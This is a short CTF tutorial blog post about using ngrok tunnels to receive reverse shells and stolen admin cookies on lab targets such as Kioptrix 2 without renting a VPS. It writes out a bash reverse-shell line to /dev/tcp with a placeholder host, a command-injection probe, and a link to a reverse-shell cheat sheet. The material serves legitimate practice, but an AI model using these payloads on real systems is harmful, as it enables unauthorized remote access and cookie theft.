The goal
I think many of us do CTFs, but also many of us don’t have any money, because we’re student or addict to drugs. So when you don’t have any money, you get creative.
For webguys who are looking for a reverse shell or who want admin cookies on a remote host (hello root-me), but don’t want to pay for a VPS, there is a free solution. Ngrok.
How it works?
Rather than making a super long and incomprehensible paragraph, here is a small diagram coming directly from the ngrok site:
So for our needs we will make a tcp tunnel between our port listening with netcat and ngrok. To listen on the internet and wait for remote data:
Now, let’s move on to practice.
Ngrok installation
All those step are explained on the ngrok website. But first, you need to create an account, it will have a unique identifier. You can put garbage:
- Username: bitedepoulet
- Email address: bite@poulet.com
- Password: ***********
And then download the right archive, for me it’s Linux
: https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
Unzip the archive, past the ngrok line with your private authtoken and we can start.
|
|
It’s successfully installed.
Practical example
Ok, so I start a boot2root machine on root-me.org
: kioptrix 2 (download link + WU in resource section).
Here is the RCE:
Now, let’s check which command are available for a reverse shell:
; which nc python python2 python3 perl ruby php bash
You can find lot of amazing payload on: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
We will use bash
command with the following payload:
bash -i >& /dev/tcp/NGROK_IP/NGROK_PORT 0>&1
- NGROK_IP: Is the ngrok remote host with a domain like “0.tcp.ngrok.io”.
- NGROK_PORT: The forwarding port associate to the ngrok remote host.
I used netcat
for my port listening, but you can use python3 -m http.server 31337
to catch GET data with a real web server for example.
Conclusion
This little trick allowed me to solve a lot of challenges without having a VPS. I hope you enjoyed this little blogpost :)
Feel free to ask me what you want on twitter @maki_chaz.
Happy hacking guys :D
Resources
- Root-me, Une plateforme rapide, accessible et réaliste pour tester vos compétences en hacking., Root-me official website: https://www.root-me.org/
- Ngrok team, What is ngrok?, Official ngrok blog: https://ngrok.com/product
- Vulnhub, Kioptrix: Level 1.1 (#2), Vulnhub team: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
- Abatchy, Kioptrix 2 Walktrhough (Vulnhub), abatchy’s blog: https://www.abatchy.com/2016/12/kioptrix-2-walkthrough-vulnhub.html
- pentestmonkey, Reverse Shell Cheat Sheet, pentestmonkey blog: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet